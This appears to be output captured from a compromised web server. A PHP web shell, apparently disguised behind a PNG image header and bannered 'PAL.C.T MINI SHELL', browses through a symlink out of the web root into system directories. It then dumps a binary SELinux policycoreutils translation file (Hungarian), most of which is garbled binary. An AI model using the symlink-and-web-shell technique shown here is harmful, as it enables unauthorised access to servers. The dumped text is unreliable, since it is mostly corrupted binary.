php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/sym/root/usr/share/locale/hu/LC_MESSAGES/
upload
files >> /var/www/html/sub/images/sym/root/usr/share/locale/hu/LC_MESSAGES/policycoreutils.mo

)88-8A8\8l8?8;8&89&9`99}979999:#:5:D:U:f:j:q:::::::;/;>;U;[;k;Go;E;$;)"<ML<5<)<l<)g==2=L=K/>{>">>>!>'?DA?B??AT@@4@&@,A%;A2aAAKA5AT3B<BLB(C,;CPhC2C.CJD%fD(D4DD]ECdE(EE$FF%F-FLGxhGG(GH/H27HjHHH2H#H1H2IQI kI"IIjJK
LLLPL'MEM![M}M"MMMM-N%>N(dN1N*N2N(OFO%dO$OO OOP"+P$NP!sPP%PP P Q9QRQ$nQQ%QQ$QR$5R'ZRRRRRRS%S"?SbSS S SS ST*T$FTkT%TTTTT#U?U\UwUU5UUV!%V(GV!pV"V!V&VV$W/=W/mW4W2WX?X$_X)X)X.X,Y)4Y)^Y.Y,Y)Y)Z.8Z,gZ$ZZ)ZZ[
[&[	9[	C[M[a[u[[[
[-[([)\28\2k\-\*\*\%"]%H]*n].],]/]$%^/J^+z^-^+^+_',_$T_,y_-_0_.`+4`0``4`+`(`)a+Ea,qa+a#a%a#b)8b,bb+b+b+b-c+Ac-mc-c.c(c-!d/Od.d$d)d)d.'e-Ve*e*e/e-
f*8f.cf2f+f*f.g*Kg0vg+g-g-h+/h-[h,h+h,h)i*9i)di&i+i,i*j,9j,fj+j-j*j*k*Ck*nk)k*k%k/l-Dl)rl&l/l-l/!m&Qm0xm#m-m-m*)n)Tn%~n+n-n+n$*o(Oo*xo*o$o0o-$p*Rp#}p+p/p3p.1q&`q4q+q.q*r+Br+nr+r,r+r/s+Os){s-s*s*s-)t/Wt)t,t+t/
u0:u*ku)u.u-u+v,Iv.vv-v)v*v)(w)Rw,|w,www1w:0x9kxNxxyWy	ky2uyJy<y0z Jzkz"z+z&z{#{8{!V{%x{{{!{ { |F;|
||
|||	||
|}	};(}"d}}}}}
}
}}}4})~E~ T~6u~~~~~~	1D
P[
r<}#		


&8S	oy%Gۀ#/59=BOerρ	


,12L88(/8GMVv؃&("Cf(Ą	 2Qc
uąх:7-eņ҆,F&:U'E<mG%025c6Њqmt|,,*'.>3m42֍4	E>)>h",Տ(D]i}*Ȑ''6^]o͑
ڑ	rUb	Ԓޒ.*?jL%	/4K<0Ԕ
_},4•#,(H(q"Ӗ%<Xs×˗ӗۗ"#37W$Ƙܘ#2 :[tc^;PJ%לE7C{%Ýڝ -0^z3&˞"2H?c
#˟{wr==(rfC١<ZF0FXwkУm<'BҤ6+L@xDn^m̦u<W<M<8MX4j۩XFN*kyDR*w}EA;i}CF+_rIҮmJbBuP8	KBk*޳K&Qx5K޴@**k1ȵöeu
P205*fA*Ӻ/..M]:GK.Dz\B%_6:+.#'R.z13۾-+=Di-.ܿ8D3],+?+*/V$9.*,?3l-,%27=j"9+"1;T66.BH.)556-l-94G734;5$2ZA69#@9d??BAa*M8:U:=<	9F9<;@3@tCB2<9o9,9F_/y7//C8s:50.N,},15	3?6s,51
3?1s1-*303d6-*6(@_1./112c0)+)/G2w1113@1t335.D3s55./B/r4300<5m315	??21517L23213P*12/*D0o,22132e213111c1101*,\64/,%5R35,6)V330/2I1|31+.@0o1*7351i*26904j-;1	5;1q2112:1m510480m03</@2p146
1A0s5422B4u303/C0s33(HAQ?ex/N@gME8_,8615(g5+15$#Z*~  KW m,
1D=*	 
B3v(F"8AM)mU2;	
*-*X3?IA	
%'1Yt
$A
O	lv:Q
 +D	J"Tw1.!'>/n'='0.4_&0DUtFL*,w&#?R*1}QI2KW~mDXr>89	J	a	g		 
/)
+Y

%)@5C>yCDBA
E
C
-C9'(0P=/+#4Xw"&.;#Z0~4uuzp"(G\9dG[p2$HUD'2	~9(!,:?g62;/M0}&(6352i,	#578mG99O=
DO1eMjje{}\k<-C
Hb&ig&1,7<>(,E\3oo#=qs'9+g{x$]B1
h?W:#%wefSDK@3IQFH~(r'V$3h-C]T!u=h5 26F	`f40pu|RY%*$0uJd!lG8b`UpYvS {XY
nJyJi1kO&-
	C|r).UPA:;EczVx9E[KT,*vP0"k8cXQg
2oVqqU_f;?e^Pw}R_I+
}tBwlyDA?xm/dym^MaF*Ol~v>Nn6Ta@)rIi2BZZ5)` dDMWXGN4b7>pt\([acGz=^/N[st;|5!@H.ZLOn#L"A_'4j/<.]7W	R+"9LsQS:~m%Kz68%s changed labels.
%s is already in %s%s is not a valid context
%s is not in %s%s must be a directory%s!  Could not get current context for %s, not relabeling tty.
%s!  Could not get new context for %s, not relabeling tty.
%s!  Could not set new context for %s
%s:  Can't load policy and enforcing mode requested:  %s
%s:  Can't load policy:  %s
%s:  Policy is already loaded and initial load requested
******************** IMPORTANT ***********************
...600-1024<b>Applications</b><b>Login Users</b><b>Root Users</b><b>Select:</b><b>TCP Ports</b><b>UDP Ports</b>AddAdd %sAdd Booleans DialogAdd File ContextAdd Network PortAdd SELinux Login MappingAdd SELinux Network PortsAdd SELinux UserAdd SELinux User MappingAdd UserAddr %s is defined in policy, cannot be deletedAddr %s is not definedAdminAdmin User RoleAllAllow SELinux webadm user to manage unprivileged users home directoriesAllow SELinux webadm user to read unprivileged users home directoriesAllow Samba to share nfs directoriesAllow Spam Assassin daemon network accessAllow X-Windows server to map a memory region as both executable and writableAllow all daemons the ability to use unallocated ttysAllow all daemons to write corefiles to /Allow cdrecord to read various content. nfs, samba, removable devices, user temp and untrusted content filesAllow clients to write to X shared memoryAllow daemons to run with NISAllow evolution and thunderbird to read user filesAllow gadmin SELinux user account to execute files in home directory or /tmpAllow guest SELinux user account to execute files in home directory or /tmpAllow java executable stackAllow mount to mount any directoryAllow mount to mount any fileAllow mplayer executable stackAllow normal user to execute pingAllow pppd to be run for a regular userAllow privileged utilities like hotplug and insmod to run unconfinedAllow programs to read files in non-standard locations (default_t)Allow rc scripts to run unconfined, including any daemon started by an rc script that does not have a domain transition explicitly definedAllow regular users direct mouse access (only allow the X server)Allow rpm to run unconfinedAllow sasl authentication server to read /etc/shadowAllow spamd to access home directoriesAllow squid daemon to connect to the networkAllow ssh logins as sysadm_r:sysadm_tAllow ssh to run from inetd instead of as a daemonAllow ssh to run ssh-keysignAllow staff SELinux user account to execute files in home directory or /tmpAllow staff Web Browsers to write to home directoriesAllow staff_r users to search the sysadm home dir and read files (such as ~/.bashrc)Allow stunnel daemon to run as standalone, outside of xinetdAllow sysadm SELinux user account to execute files in home directory or /tmpAllow sysadm_t to directly start daemonsAllow the mozilla browser to read user filesAllow unconfined SELinux user account to execute files in home directory or /tmpAllow unconfined to dyntrans to unconfined_execmemAllow unlabeled packets to flow on the networkAllow user SELinux user account to execute files in home directory or /tmpAllow user to connect to mysql socketAllow user to connect to postgres socketAllow user to r/w noextattrfile (FAT, CDROM, FLOPPY)Allow user to stat ttyfilesAllow user_r to reach sysadm_r via su, sudo, or userhelper. Otherwise, only staff_r can do soAllow users to control network interfaces (also needs USERCTL=true)Allow users to execute the mount commandAllow users to run TCP servers (bind to ports and accept connection from the same domain and outside users)  disabling this forces FTP passive mode and may change other protocolsAllow users to run the dmesg commandAllow users to rw usb devicesAllow xdm logins as sysadm_r:sysadm_tAllow xen to read/write physical disk devicesAllow xguest SELinux user account to execute files in home directory or /tmpAllow xinetd to run unconfined, including any services it starts that do not have a domain transition explicitly definedApplicationAre you sure you want to delete %s '%s'?Bad format %s: Record %sBooleanBoolean %s is defined in policy, cannot be deletedBoolean %s is not definedBoolean NameCVSCan not combine +/- with other types of categoriesCan not have multiple sensitivitiesCan not modify sensitivity levels using '+' on %sCannot find your entry in the shadow passwd file.
Cannot read policy store.Change process mode to enforcingChange process mode to permissive.Changing the policy type will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?Changing to SELinux disabled requires a reboot.  It is not recommended.  If you later decide to turn SELinux back on, the system will be required to relabel.  If you just want to see if SELinux is causing a problem on your system, you can go to permissive mode which will only log errors and not enforce SELinux policy.  Permissive mode does not require a reboot    Do you wish to continue?Changing to SELinux enabled will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?CompatibilityConfigue SELinuxContextCopyright (c)2006 Red Hat, Inc.
Copyright (c) 2006 Dan Walsh <dwalsh@redhat.com>Could not add SELinux user %sCould not add addr %sCould not add file context for %sCould not add interface %sCould not add login mapping for %sCould not add port %s/%sCould not add prefix %s for %sCould not add role %s for %sCould not check if SELinux user %s is definedCould not check if addr %s is definedCould not check if boolean %s is definedCould not check if file context for %s is definedCould not check if interface %s is definedCould not check if login mapping for %s is definedCould not check if port %s/%s is definedCould not close descriptors.
Could not commit semanage transactionCould not create SELinux user for %sCould not create a key for %sCould not create a key for %s/%sCould not create addr for %sCould not create context for %sCould not create context for %s/%sCould not create file context for %sCould not create interface for %sCould not create key for %sCould not create login mapping for %sCould not create port for %s/%sCould not create semanage handleCould not delete SELinux user %sCould not delete addr %sCould not delete boolean %sCould not delete file context for %sCould not delete interface %sCould not delete login mapping for %sCould not delete port %s/%sCould not delete the file context %sCould not delete the port %sCould not determine enforcing mode.
Could not establish semanage connectionCould not extract key for %sCould not list SELinux modulesCould not list SELinux usersCould not list addrsCould not list booleansCould not list file contextsCould not list interfacesCould not list local file contextsCould not list login mappingsCould not list portsCould not list roles for user %sCould not list the file contextsCould not list the portsCould not modify SELinux user %sCould not modify addr %sCould not modify boolean %sCould not modify file context for %sCould not modify interface %sCould not modify login mapping for %sCould not modify port %s/%sCould not open file %s
Could not query addr %sCould not query file context %sCould not query file context for %sCould not query interface %sCould not query port %s/%sCould not query seuser for %sCould not query user for %sCould not remove permissive domain %s (remove failed)Could not set MLS level for %sCould not set MLS range for %sCould not set SELinux user for %sCould not set active value of boolean %sCould not set addr context for %sCould not set exec context to %s.
Could not set file context for %sCould not set interface context for %sCould not set mask for %sCould not set message context for %sCould not set mls fields in addr context for %sCould not set mls fields in file context for %sCould not set mls fields in interface context for %sCould not set mls fields in port context for %s/%sCould not set name for %sCould not set permissive domain %s (module installation failed)Could not set port context for %s/%sCould not set role in addr context for %sCould not set role in file context for %sCould not set role in interface context for %sCould not set role in port context for %s/%sCould not set type in addr context for %sCould not set type in file context for %sCould not set type in interface context for %sCould not set type in port context for %s/%sCould not set user in addr context for %sCould not set user in file context for %sCould not set user in interface context for %sCould not set user in port context for %s/%sCould not start semanage transactionCouldn't get default type.
Create/Manipulate temporary files in /tmpCronCurrent Enforcing ModeCustomizedDBUS System DaemonDatabasesDelete %sDelete File ContextDelete Network PortDelete SELinux User MappingDelete UserDescriptionDisable AuditDisable SELinux protection for Cluster ServerDisable SELinux protection for EvolutionDisable SELinux protection for Hal daemonDisable SELinux protection for NIS Password DaemonDisable SELinux protection for NIS Transfer DaemonDisable SELinux protection for NetworkManagerDisable SELinux protection for ThunderbirdDisable SELinux protection for acct daemonDisable SELinux protection for amandaDisable SELinux protection for amavisDisable SELinux protection for apmd daemonDisable SELinux protection for arpwatch daemonDisable SELinux protection for auditd daemonDisable SELinux protection for automount daemonDisable SELinux protection for avahiDisable SELinux protection for bluetooth daemonDisable SELinux protection for canna daemonDisable SELinux protection for cardmgr daemonDisable SELinux protection for ciped daemonDisable SELinux protection for clamd daemonDisable SELinux protection for clamscanDisable SELinux protection for clvmdDisable SELinux protection for comsat daemonDisable SELinux protection for courier daemonDisable SELinux protection for cpucontrol daemonDisable SELinux protection for cpuspeed daemonDisable SELinux protection for crond daemonDisable SELinux protection for cups hplip daemonDisable SELinux protection for cupsd back end serverDisable SELinux protection for cupsd daemonDisable SELinux protection for cupsd_lpdDisable SELinux protection for cvs daemonDisable SELinux protection for cyrus daemonDisable SELinux protection for dbskkd daemonDisable SELinux protection for dbusd daemonDisable SELinux protection for dccdDisable SELinux protection for dccifdDisable SELinux protection for dccmDisable SELinux protection for ddt daemonDisable SELinux protection for devfsd daemonDisable SELinux protection for dhcpc daemonDisable SELinux protection for dhcpd daemonDisable SELinux protection for dictd daemonDisable SELinux protection for distccd daemonDisable SELinux protection for dmesg daemonDisable SELinux protection for dnsmasq daemonDisable SELinux protection for dovecot daemonDisable SELinux protection for entropyd daemonDisable SELinux protection for fetchmailDisable SELinux protection for fingerd daemonDisable SELinux protection for freshclam daemonDisable SELinux protection for fsdaemon daemonDisable SELinux protection for gamesDisable SELinux protection for gpm daemonDisable SELinux protection for gss daemonDisable SELinux protection for hostname daemonDisable SELinux protection for hotplug daemonDisable SELinux protection for howl daemonDisable SELinux protection for http suexecDisable SELinux protection for httpd rotatelogsDisable SELinux protection for hwclock daemonDisable SELinux protection for i18n daemonDisable SELinux protection for imazesrv daemonDisable SELinux protection for inetd child daemonsDisable SELinux protection for inetd daemonDisable SELinux protection for innd daemonDisable SELinux protection for iptables daemonDisable SELinux protection for ircd daemonDisable SELinux protection for irqbalance daemonDisable SELinux protection for iscsi daemonDisable SELinux protection for jabberd daemonDisable SELinux protection for kadmind daemonDisable SELinux protection for klogd daemonDisable SELinux protection for krb5kdc daemonDisable SELinux protection for ktalk daemonsDisable SELinux protection for kudzu daemonDisable SELinux protection for locate daemonDisable SELinux protection for lpd daemonDisable SELinux protection for lrrd daemonDisable SELinux protection for lvm daemonDisable SELinux protection for mailmanDisable SELinux protection for mdadm daemonDisable SELinux protection for monopd daemonDisable SELinux protection for mrtg daemonDisable SELinux protection for mysqld daemonDisable SELinux protection for nagios daemonDisable SELinux protection for named daemonDisable SELinux protection for nessusd daemonDisable SELinux protection for nfsd daemonDisable SELinux protection for nmbd daemonDisable SELinux protection for nrpe daemonDisable SELinux protection for nscd daemonDisable SELinux protection for nsd daemonDisable SELinux protection for ntpd daemonDisable SELinux protection for oddjobDisable SELinux protection for oddjob_mkhomedirDisable SELinux protection for openvpn daemonDisable SELinux protection for pam daemonDisable SELinux protection for pegasusDisable SELinux protection for perdition daemonDisable SELinux protection for portmap daemonDisable SELinux protection for portslave daemonDisable SELinux protection for postfixDisable SELinux protection for postgresql daemonDisable SELinux protection for pptpDisable SELinux protection for prelink daemonDisable SELinux protection for privoxy daemonDisable SELinux protection for ptal daemonDisable SELinux protection for pxe daemonDisable SELinux protection for pyzordDisable SELinux protection for quota daemonDisable SELinux protection for radiusd daemonDisable SELinux protection for radvd daemonDisable SELinux protection for rdiscDisable SELinux protection for readaheadDisable SELinux protection for restorecondDisable SELinux protection for rhgb daemonDisable SELinux protection for ricciDisable SELinux protection for ricci_modclusterdDisable SELinux protection for rlogind daemonDisable SELinux protection for rpcd daemonDisable SELinux protection for rshdDisable SELinux protection for rsync daemonDisable SELinux protection for saslauthd daemonDisable SELinux protection for scannerdaemon daemonDisable SELinux protection for sendmail daemonDisable SELinux protection for setransDisable SELinux protection for setroubleshoot daemonDisable SELinux protection for slapd daemonDisable SELinux protection for slrnpull daemonDisable SELinux protection for smbd daemonDisable SELinux protection for snmpd daemonDisable SELinux protection for snort daemonDisable SELinux protection for sound daemonDisable SELinux protection for soundd daemonDisable SELinux protection for spamd daemonDisable SELinux protection for speedmgmt daemonDisable SELinux protection for squid daemonDisable SELinux protection for ssh daemonDisable SELinux protection for stunnel daemonDisable SELinux protection for swat daemonDisable SELinux protection for sxid daemonDisable SELinux protection for syslogd daemonDisable SELinux protection for system cron jobsDisable SELinux protection for tcp daemonDisable SELinux protection for telnet daemonDisable SELinux protection for tftpd daemonDisable SELinux protection for the web browsersDisable SELinux protection for transproxy daemonDisable SELinux protection for udev daemonDisable SELinux protection for uml daemonDisable SELinux protection for updfstab daemonDisable SELinux protection for uptimed daemonDisable SELinux protection for uucpd daemonDisable SELinux protection for vmware daemonDisable SELinux protection for watchdog daemonDisable SELinux protection for winbind daemonDisable SELinux protection for xdm daemonDisable SELinux protection for xen controlDisable SELinux protection for xen daemonDisable SELinux protection for xfs daemonDisable SELinux protection for ypbind daemonDisable SELinux protection for ypserv daemonDisabledDisabled
Permissive
Enforcing
Do not allow any processes to load kernel modulesDo not allow any processes to modify kernel SELinux policyDo not allow transition to sysadm_t, sudo and su effectedDo not audit things that we know to be broken but which are not security risksEdit Network PortEnable AuditEnable/Disable additional audit rules, that are normally not reported in the log files.EnforcingEnter complete path for executable to be confined.Enter complete path to init script used to start the confined application.Enter unique name for the confined application or user role.Error allocating memory.
Error allocating shell's argv0.
Error changing uid, aborting.
Error connecting to audit system.
Error dropping SETUID capability, aborting
Error dropping capabilities, aborting
Error freeing caps
Error resetting KEEPCAPS, aborting
Error sending audit message.
Error setting KEEPCAPS, aborting
Error setting capabilities, aborting
Error!  Could not open %s.
Error!  Shell is not valid.
Error: multiple levels specified
Error: multiple roles specified
Error: multiple types specified
Error: you are not allowed to change levels on a non secure terminal 
ExecutableExisting User RolesExisting_UserFailed to close tty properly
File
SpecificationFile
TypeFile Contexts fileFile LabelingFile SpecificationFile TypeFile context for %s is defined in policy, cannot be deletedFile context for %s is not definedFilterGPLGamesGenerate new policy moduleGroup ViewHTTPD ServiceInit scriptInteracts with the terminalInterface %s is defined in policy, cannot be deletedInterface %s is not definedInterface fileInternet Services Daemon (inetd)Internet Services Daemon are daemons started by xinetdInvalid file specificationKerberosLabelingLinux Group %s does not existLinux User %s does not existList ViewLoad Policy ModuleLoad policy moduleLockdown...Login
NameLogin '%s' is requiredLogin NameLogin mapping for %s is defined in policy, cannot be deletedLogin mapping for %s is not definedMCS LevelMCS RangeMLSMLS/MLS/
MCS RangeMLS/MCS
LevelMLS/MCS RangeMemory ProtectionMinimal Terminal User RoleMinimal X Windows User RoleModify %sModify File ContextModify SELinux User MappingModify UserModify an existing login user record.Module %s.pp already loaded in current policy.
Do you want to continue?Module NameMountNFSNISNameName ServiceNetwork ConfigurationNetwork PortNo context in file %s
Node Address is requiredNode Netmask is requiredNot yet implementedOptions Error %s Out of memory!
Password:PermissivePolgenPolicy DirectoryPolicy ModulePortPort %s/%s already definedPort %s/%s is defined in policy, cannot be deletedPort %s/%s is not definedPort NumberPort is requiredPort number "%s" is not valid.  0 < PORT_NUMBER < 65536 Ports must be numbers or ranges of numbers from 1 to %d PrefixPrintingProcess DomainProtoProtocolProtocol udp or tcp is requiredRed Hat 2007Relabel on next reboot.Remove loadable policy moduleRequires at least one categoryRequires prefix or rolesRequires prefix, roles, level or rangeRequires setypeRequires setype or serangeRequires setype, serange or seuserRequires seuser or serangeRevert boolean setting to system defaultRoleRoot Admin User RoleRun booleans lockdown wizardSASL authentication serverSELinux
UserSELinux AdministrationSELinux InterfaceSELinux Policy Generation ToolSELinux Port
TypeSELinux Port TypeSELinux RolesSELinux Service ProtectionSELinux TypeSELinux Type is requiredSELinux UserSELinux booleanSELinux fcontextSELinux policy is not managed or store cannot be accessed.SELinux user %s is defined in policy, cannot be deletedSELinux user %s is not definedSELinux user '%s' is requiredSSHSambaSelect Management ObjectSelect PortsSelect Root Administrator User Role, if this user will be used to administer the machine while running as root.  This user will not be able to login to the system directly.Select directory to generate policy files inSelect directory(s) that the confined application owns and writes intoSelect executable file to be confined.Select file(s) that confined application creates or writesSelect if you wish to relabel then entire file system on next reboot.  Relabeling can take a very long time, depending on the size of the system.  If you are changing policy types or going from disabled to enforcing, a relabel is required.Select init script file to be confined.Select the domains that you would like this user administer.Select the user roles that will transiton to this applications domains.Selinux
File TypeSends audit messagesSends emailSetup ScriptSorry, -l may be used with SELinux MLS support.
Sorry, newrole may be used only on a SELinux kernel.
Sorry, run_init may be used only on a SELinux kernel.
Spam ProtectionSquidStandard Init DaemonStandard Init Daemon are daemons started on boot via init scripts.  Usually requires a script in /etc/rc.d/init.dStatusSystem Default Enforcing ModeSystem Default Policy Type: This user can login to a machine via X or terminal.  By default this user will have no setuid, no networking, no sudo, no suThis user will login to a machine only via a terminal or remote login.  By default this user will have  no setuid, no networking, no su, no sudo.To make this policy package active, execute:Toggle between Customized and All BooleansToggle between Customized and All PortsToggle between all and customized file contextTransition staff SELinux user to Web Browser DomainTransition sysadm SELinux user to Web Browser DomainTransition user SELinux user to Web Browser DomainTransition xguest SELinux user to Web Browser DomainType %s_t already defined in current policy.
Do you want to continue?Type Enforcement fileType is requiredUSAGE: run_init <script> <args ...>
  where: <script> is the name of the init script to run,
         <args ...> are the arguments to that script.Unable to allocate memory for new_contextUnable to clear environment
Unable to obtain empty signal set
Unable to restore the environment, aborting
Unable to restore tty label...
Unable to set SIGHUP handler
Universal SSL tunnelUnknown or missing protocolUnreserved Ports (>1024)Usage %s -LUsage %s -L -l userUsage %s -d File ...Usage %s -l -d user ...Usage %s -l CATEGORY user ...Usage %s -l [[+|-]CATEGORY],...]q user ...Usage %s CATEGORY File ...Usage %s [[+|-]CATEGORY],...]q File ...Use -- to end option list.  For exampleUser ApplicationUser Application are any application that you would like to confine that is started by a userUser MappingUser PrivsUser RoleUser with full networking, no setuid applications without transition, no su, can sudo to Root Administration RolesUser with full networking, no setuid applications without transition, no sudo, no su.Uses Pam for authenticationUses dbusUses nsswitch or getpw* callsVerify NameVersionWarning!  Could not retrieve tty information.
Warning! Could not restore context for %s
Web Application/Script (CGI)Web ApplicationsWeb Applications/Script (CGI) CGI scripts started by the web server (apache)Writes syslog messages	XENXServerYou must add at least one role for %sYou must enter a executableYou must enter a name for your confined process/userYou must enter the executable path for your confined processYou must select a userYou must specify one of the following values: %s_Delete_Propertiesallall files
regular file
directory
character device
block device
socket
symbolic link
named pipe
authentication failed.
cannot find valid entry in the passwd file.
chcat -- -CompanyConfidential /docs/businessplan.odtchcat -l +CompanyConfidential jusererror on reading PAM service configuration.
failed to build new range with level %s
failed to convert new context to string
failed to exec shell
failed to get account information
failed to get new context.
failed to get old_context.
failed to initialize PAM
failed to set PAM_TTY
failed to set new range %s
failed to set new role %s
failed to set new type %s
getpass cannot open /dev/tty
globallabel37label38label39label41label42label44label50label59newrole:  %s:  error on line %lu.
newrole: failure forking: %snewrole: incorrect password for %s
newrole: service name configuration hashtable overflow
offonpppdrsyncrun_init: incorrect password for %s
system-config-selinuxtranslator-creditstypeunknownusage:  %s [-qi]
use_syslog must be a boolean value Project-Id-Version: policycoreutils
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2014-10-17 23:48+0000
PO-Revision-Date: 2010-03-16 17:20+0100
Last-Translator: Peter Bojtos <ptr@ulx.hu>
Language-Team: Hungarian <fedora-trans-hu@redhat.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Language: hu
X-Generator: Lokalize 0.3
Plural-Forms: nplurals=2; plural=(n != 1);
X-Poedit-Language: Hungarian
X-Poedit-Country: HUNGARY
%s címkét módosított.
%s már benne van ebben: %s%s nem egy érvényes kontextus
%s nincs benne ebben: %s%s csak könyvtár lehet%s: nem sikerült meghatározni a jelenlegi kontextust ehhez: %s - a tty nem lesz újracímkézve.
%s: nem sikerült meghatározni az új kontextust ehhez: %s - a tty nem lesz újracímkézve.
%s: nem sikerült beállítani az új kontextust ehhez: %s
%s: A házirend nem tölthető be és kikényszerítő mód igényelt: %s
%s: szabályzat nem betölthető: %s
%s: A házirend már be van töltve és kezdeti betöltés igényelt
*********************** FONTOS ***********************
...600-1024<b>Alkalmazások</b><b>Felhasználók bejelentkezése</b><b>rendszergazdák</b><b>Kiválasztás:</b><b>TCP Portok</b><b>UDP Portok</b>Hozzáadás%s hozzáadásaLogikai érték hozzáadása párbeszédpanelFájlkontextus hozzáadásaHálózati port hozzáadásaSELinux bejelentkezés hozzárendelés hozzáadásaSELinux hálózati portok hozzáadásaSELinux felhasználó hozzáadásaSELinux felhasználó hozzárendelés hozzáadásaFelhasználó hozzáadásaA(z) %s addr nincs definiálva a házirendben, nem törölhető%s addr nincs definiálvaRendszergazdaRendszergazda Felhasználói SzerepMindenA nem kiváltságos felhasználói saját könyvtárak menedzselésének engedélyezése az SELinux webadm felhasználónakA nem kiváltságos felhasználói saját könyvtárak olvasásának engedélyezése az SELinux webadm felhasználónakAz nfs könyvtárak megosztásának engedélyezése Samba-valA Spam Assassin démon hálózatelérésének engedélyezéseEngedélyezze az X-Ablakok kiszolgálónak egyszerre futtatható és írható memória régió feltérképezésétEngedélyezze minden démonnak a le nem foglalt tty-k használatátMinden démonnak engedélyezze a magfájlok írását a /-beEngedélyezze, hogy a cdrecord különböző tartalmakat olvasson. nfs, samba, eltávolítható eszközök, felhasználói temp és nem megbízható tartalomfájlokA kliensek számára az X osztott memória írásának engedélyezéseDémonok NIS-szel futtatásának engedélyezéseA thunderbird és evolution számára engedélyezze a felhasználói fájlok olvasásátEngedélyezze a gadmin SELinux felhasználónak a fájlok futtatását a saját könyvtárban vagy /tmp-benEngedélyezze a vendég SELinux felhasználóknak a fájlok futtatását a saját könyvtárban vagy /tmp-benEngedélyezze a java futtatható vermetEngedélyezze, hogy a mount minden könyvtárat csatlakoztathassonEngedélyezze, hogy a mount minden fájlt csatolhassonEngedélyezze az mplayer futtatható vermetA ping futtatásának engedélyezése a normál felhasználónakA pppd átlagos felhasználó általi futtatásának engedélyezéseA kiváltságos segédprogramok, mint hotplug és insmod korlátozás nélküli futtatásának engedélyezéseEngedélyezze a programoknak, hogy nem-szabványos helyekről olvassanak fájlokat (default_t)Az rc szkriptek korlátozás nélküli futtatásának engedélyezése, beleértve minden olyan démont, amelyet egy rc szkript indít, aminek nincs explicit definiált tartomány átmeneteKözvetlen egér-hozzáférés engedélyezése az átlagos felhasználóknak (csak az X kiszolgáló engedélyezése)Az rpm korlátozás nélküli futtatásának engedélyezéseA /etc/shadow olvasásának engedélyezése az sasl hitelesítő kiszolgáló számáraEngedélyezze a spamd-nek a felhasználók saját könyvtárainak elérésétA squid démon hálózati kapcsolódásának engedélyezéseA sysadm_r:sysadm_t ssh bejelentkezések engedélyezéseAz ssh nem démonként, hanem inetd-ből való futtatásának engedélyezéseEngedélyezze az ssh-nak az ssh-keysign futtatásátEngedélyezze a staff SELinux felhasználónak a fájlok futtatását a saját könyvtárban vagy /tmp-benA staff webböngészőknek a felhasználók saját könyvtáraiba írás engedélyezéseEngedélyezze, hogy a staff_r felhasználók keressenek és olvashassák a fájlokat (mint pl.: ~/.bashrc) a sysadm saját könyvtárábanAz stunnel számára a különálló, xinetd-n kívüli futás engedélyezéseEngedélyezze a sysadm SELinux felhasználónak a fájlok futtatását a saját könyvtárban vagy /tmp-benEngedélyezze, hogy a sysadm_t közvetlenül indíthasson démonokatA mozilla böngésző számára engedélyezze a felhasználói fájlok olvasásátEngedélyezze a nem megerősített SELinux felhasználónak a fájlok futtatását a saját könyvtárban vagy /tmp-benMeg nem erősített dyntrans engedélyezése az unconfined_execmem-beEngedélyezze a címkézetlen csomagok áramlását a hálózatonEngedélyezze a user SELinux felhasználónak a fájlok futtatását a saját könyvtárban vagy /tmp-benA felhasználó mysql foglalathoz csatlakozásának engedélyezéseA felhasználó postgres foglalathoz csatlakozásának engedélyezéseA felhasználó számára az noextattrfile írás/olvasás engedélyezése (FAT, CDROM, FLOPPY)A tty fájlok statisztikáinak engedélyezése a felhasználók számáraA sysadm_r su-val, sudo-val, vagy userhelper-rel elérésének engedélyezése a user_r számára. Egyébként csak a staff_r teheti ezt megA hálózati interfészek vezérlésének engedélyezése a felhasználóknak (szükséges a USERCTL=igaz is)A mount parancs használatának engedélyezése a felhasználók számáraTCP kiszolgálók futtatásának engedélyezése a felhasználóknak (portok kötése és kapcsolatok fogadása ugyanabból a tartományból és külső felhasználóktól)  ennek a letiltása kikényszeríti az FTP passzív módot és más protokollokat is megváltoztathatA dmesg parancs futtatásának engedélyezése a felhasználóknakUSB eszközök írásának és olvasásának engedélyezése a felhasználóknakA sysadm_r:sysadm_t xdm bejelentkezések engedélyezéseA xen számára a fizikai lemezek olvasásának/írásának engedélyezéseEngedélyezze a xguest SELinux felhasználónak a fájlok futtatását a saját könyvtárban vagy /tmp-benA xinetd korlátozás nélküli futtatásának engedélyezése, beleértve minden olyan elindított szolgáltatását, amelynek nincs explicit megadott tartomány átmeneteAlkalmazásBiztos, hogy törölni akarja a %st: '%s'?Hibás formátum %s: Rekord %sLogikaiA(z) "%s" logikai érték szabályzatban van definiálva - nem törölhető"%s" logikai érték nincs definiálvaLogikai NévCVSA +/- nem kombinálható egyéb fajta kategóriákkalNem lehet több érzékenységAz érzékenységi szintek nem módosíthatók "+" használatával ezen: %sAz Ön bejegyzése nem található az árnyék-jelszófájlban.
Nem lehet olvasni a szabályzat-tárolót.SELinux kikényszerítő módjának bekapcsolásaVáltás megengedő módraA házirend típus megváltoztatása miatt az egész fájlrendszert újra kell címkézni a következő újraindításkor. Az újracímkézés hosszú időt vehet igénybe a fájlrendszer méretétől függően.  Folytatja?Az SELinux kikapcsolása újraindítást igényel.  Ez nem ajánlott.  Ha később úgy dönt, hogy ismét bekapcsolja az SELinux-ot, szükség lesz a rendszer újracímkézésére.  Ha csak azt szeretné megnézni, hogy az SELinux okoz-e problémát a rendszerén, akkor átválthat megengedő módba, amelyik csak naplózza a hibákat és nem kényszeríti ki az SELinux házirend betartását.  A megengedő mód nem igényel újraindítást    Folytatja?Az SELinux engedélyezése miatt újra kell címkéznie az egész fájlrendszert a következő újraindításkor. Az újracímkézés hosszú időt vehet igénybe a fájlrendszer méretétől függően.  Folytatja?KompatibilitásSELinux beállításaKörnyezetCopyright (c)2006 Red Hat, Inc.
